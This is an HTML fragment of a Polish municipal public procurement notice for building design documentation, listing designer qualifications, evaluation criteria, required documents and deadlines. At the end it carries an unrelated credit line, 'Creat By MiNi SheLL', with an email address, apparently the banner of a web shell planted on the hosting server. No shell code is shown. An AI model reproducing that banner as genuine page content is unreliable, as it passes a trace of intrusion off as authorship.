projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta w specjalności konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1.	nie podlegają wykluczeniu z postępowania,<br/>1.2.	spełniają warunki udziału w postępowaniu dotyczące:<br/>1.2.1.	Zdolności do występowania w obrocie gospodarczym - Zamawiający nie stawia warunków w tym zakresie,<br/>1.2.2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej - Zamawiający nie stawia warunków w tym zakresie,<br/>1.2.3.	Sytuacji ekonomicznej lub finansowej - Zamawiający nie stawia warunków w tym zakresie,<br/>1.2.4.	Zdolności technicznej lub zawodowej - Wykonawca spełni warunek, jeżeli wykaże, że dysponuje osobami zdolnymi do realizacji zamówienia, dla zadania 1:<br/><br/>a)	projektantem branży konstrukcyjno-budowlanej (projektant wiodący), który posiada: <br/>	uprawnienia budowlane* do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, <br/>	minimum 5 lat doświadczenia w pełnieniu samodzielnych funkcji technicznych w budownictwie,<br/>	wykształcenie wyższe,<br/>	doświadczenie** w pełnieniu samodzielnych funkcji technicznych tj. wykonał co najmniej jedną dokumentację projektową, samodzielnie lub jako członek zespołu projektowego branży konstrukcyjno-budowlanej, polegającą na budowie budynku wielorodzinnego lub jednorodzinnego lub przebudowie budynku wielorodzinnego lub jednorodzinnego lub lokalu mieszkalnego/użytkowego wraz z instalacją wody, kanalizacji sanitarnej i instalacją elektryczną o wartości minimum 12 000,00 zł brutto. <br/><br/>b)	projektantem branży instalacyjnej, który posiada: <br/>	uprawnienia budowlane* do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, <br/>	minimum 3 lata doświadczenia w pełnieniu samodzielnych funkcji technicznych w budownictwie,<br/>	wykształcenie wyższe.<br/><br/>c)	projektantem branży elektroenergetycznej, który posiada: <br/>	uprawnienia budowlane* do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, <br/>	minimum 3 lata doświadczenia w pełnieniu samodzielnych funkcji technicznych w budownictwie,<br/>	wykształcenie wyższe.<br/><br/>Zamawiający nie dopuszcza możliwości łączenia funkcji w zakresie branż. Z przedstawionych osób funkcję projektanta wiodącego pełnić będzie projektant w specjalności konstrukcyjno-budowlanej. <br/><br/><br/>1.2.5.	Zdolności technicznej lub zawodowej - Wykonawca spełni warunek, jeżeli wykaże, że dysponuje osobami zdolnymi do realizacji zamówienia, dla zadania 2:<br/><br/>a)	projektantem branży konstrukcyjno-budowlanej (projektant wiodący), który posiada: <br/>	uprawnienia budowlane* do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, <br/>	minimum 3 lat doświadczenia w pełnieniu samodzielnych funkcji technicznych w budownictwie,<br/>	wykształcenie wyższe,<br/>	doświadczenie** w pełnieniu samodzielnych funkcji technicznych tj. wykonał co najmniej jedną dokumentację projektową, samodzielnie lub jako członek zespołu projektowego branży konstrukcyjno-budowlanej, polegającą na budowie budynku wielorodzinnego lub jednorodzinnego lub przebudowie budynku wielorodzinnego lub jednorodzinnego lub lokalu mieszkalnego/użytkowego wraz z instalacją wody, kanalizacji sanitarnej i instalacją elektryczną o wartości minimum 12 000,00 zł brutto. <br/><br/>b)	projektantem branży instalacyjnej, który posiada: <br/>	uprawnienia budowlane* do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, <br/>	minimum 3 lata doświadczenia w pełnieniu samodzielnych funkcji technicznych w budownictwie,<br/>	wykształcenie wyższe.<br/><br/>c)	projektantem branży elektroenergetycznej, który posiada: <br/>	uprawnienia budowlane* do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, <br/>	minimum 3 lata doświadczenia w pełnieniu samodzielnych funkcji technicznych w budownictwie,<br/>	wykształcenie wyższe.<br/><br/>Zamawiający nie dopuszcza możliwości łączenia funkcji w zakresie branż. Z przedstawionych osób funkcję projektanta wiodącego pełnić będzie projektant w specjalności konstrukcyjno-budowlanej. <br/><br/>UWAGA 1: W przypadku złożenia oferty na zadanie 1 i zadanie 2 Zamawiający dopuszcza możliwości dysponowania tymi samymi osobami zdolnymi do wykonania zamówienia dla zadania 1 i 2. <br/>UWAGA 2: W przypadku złożenia oferty na zadanie 1 i zadanie 2 na potwierdzenie spełnienia warunków udziału w postępowaniu w zakresie dysponowania osobami zdolnymi do realizacji zamówienia Wykonawca musi się wykazać zrealizowanymi dokumentacjami projektowymi wskazanego projektanta w specjalności konstrukcyjno-budowlanej (projektanta wiodącego) innymi dla zadania 1 i zadania 2. <br/><br/>(*)Przez uprawnienia należy rozumieć: uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j Dz.U. z 2023 poz. 553) oraz w Rozporządzeniu Ministra Inwestycji i Rozwoju z dn. 29 kwietnia 2019 roku w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019r poz. 831) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tj. Dz.U. z 2020 r. poz. 220, z późn. zm.) do pełnienia samodzielnej funkcji w budownictwie.<br/>(**)Przez doświadczenie zawodowe należy rozumieć okres pełnienia samodzielnych funkcji technicznych w zakresie projektowania - w Załączniku nr 5 do SWZ „Wykaz osób” należy wskazać zrealizowane dokumentacje projektowe oraz terminy ich wykonywania (dzień, miesiąc, rok). Wymagane doświadczenie zawodowe nie jest tożsame z datą uzyskania uprawnień budowlanych.<br/><br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) Dla zadania 1: warunek, o których mowa ust. 1 pkt 1.2. ppkt 1.2.4. lit. a) nie podlega sumowaniu,<br/>b) Dla zadania 2: warunek, o których mowa ust. 1 pkt 1.2. ppkt 1.2.5. lit. a) nie podlega sumowaniu.<br/>3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenia zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają prace projektowe, do realizacji których te zdolności są wymagane.<br/>4.	W przypadku, o którym mowa wyżej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które prace projektowe wykonają poszczególni wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, potwierdzających spełnianie warunków udziału w postępowaniu, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1.1.	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za prace projektowe, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór stanowi Załącznik Nr 5 do SWZ).<br/>2.	W zakresie nieuregulowanym ustawą PZP lub SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415) oraz rozporządzenia Prezesa Rady Ministrów z 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).<br/>3.	Zamawiający nie żąda podmiotowych środków dowodowych na brak podstaw do wykluczenia.<br/>4.	Zamawiający nie żąda przedmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 7.	Jeżeli Wykonawca wykazując spełnianie warunków udziału w postępowaniu, określonych przez Zamawiającego w Rozdz. VIII SWZ, polega na zdolnościach lub sytuacji innych podmiotów, na zasadach określonych powyżej, składa wraz z ofertą zobowiązanie tych podmiotów do udostępnienia zasobów (Załącznik 4a do SWZ) oraz oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby (Załącznik nr 4b do SWZ i Załącznik nr 4c do SWZ).10.	Ponadto Wykonawca musi do oferty na zadanie 1 i na zadanie 2 dołączyć:<br/>1)	oświadczenie o powierzeniu wykonania części zamówienia podwykonawcom (Załącznik nr 4a do SWZ), o ile dotyczy,<br/>2)	zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia (Załącznik nr 4d do SWZ), o ile dotyczy, <br/>3)	oświadczenie, o którym mowa w Rozdz. VIII ust. 4 SWZ, o ile dotyczy,<br/>4)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Wykonawca nie jest zobowiązany do złożenia dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów,<br/>5)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>6)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, potwierdzające brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu, składa każdy z wykonawców (Załącznik nr 2 do SWZ i Załącznik nr 3 do SWZ).<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy według wzoru stanowiącego Załącznik nr 6.1 (dla zadania 1) i 6.2 (dla zadania 2) do SWZ w terminie i miejscu wyznaczonym przez Zamawiającego.<br/>2.	Zamawiający przewiduje zmiany umowy w formie pisemnej – aneksem zaakceptowanym przez obie strony na wniosek jednej ze stron umowy, na zasadach określonych w art. 454 i 455 ustawy PZP oraz w przypadkach, o których mowa w Paragrafie 11 umowy (załącznik nr 6.1 i załącznik nr 6.2) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/um_swidnica</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-27 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 9.	Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>9.1.	akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem - Platforma Zakupowa w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>9.2.	zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem - Platforma Zakupowa.<br/>10.	Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu.<br/>11.	Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych Strona 10 z 92 w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>12.	Dodatkowe zalecenia:<br/>1)	Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. <br/>2)	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip , .7Z. <br/>3)	Wśród rozszerzeń powszechnych a niewymienionych w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tekst jednolity Dz. U. z 2017 r., poz. 2247) występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. <br/>4)	Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max. 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max. 5MB. <br/>5)	W przypadku stosowania przez Wykonawcę kwalifikowanego podpisu elektronicznego: <br/>a)	ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na rozszerzenie .pdf i opatrzenie ich podpisem kwalifikowanym w formacie PAdES, <br/>b)	pliki w innych formatach niż .pdf zaleca się opatrzyć podpisem w formacie XAdES o typie zewnętrznym. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym, <br/>c)	Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu. <br/>6)	Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików. <br/>7)	Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania plików oferty. <br/>8)	Zaleca się, aby komunikacja z Zamawiającym odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do zamawiającego”, nie za pośrednictwem adresu email. <br/>9)	Ofertę należy przygotować z należytą starannością i odpowiednim wyprzedzeniem w stosunku do czasu wyznaczonego na składanie ofert/wniosków. <br/>10) Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1. <br/>11) Jeśli Wykonawca pakuje dokumenty np. w plik o rozszerzeniu .zip zaleca się wcześniejsze podpisanie każdego ze skompresowanych plików. <br/>12) Zamawiający zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym.

Creat By MiNi SheLL
Email: jattceo@gmail.com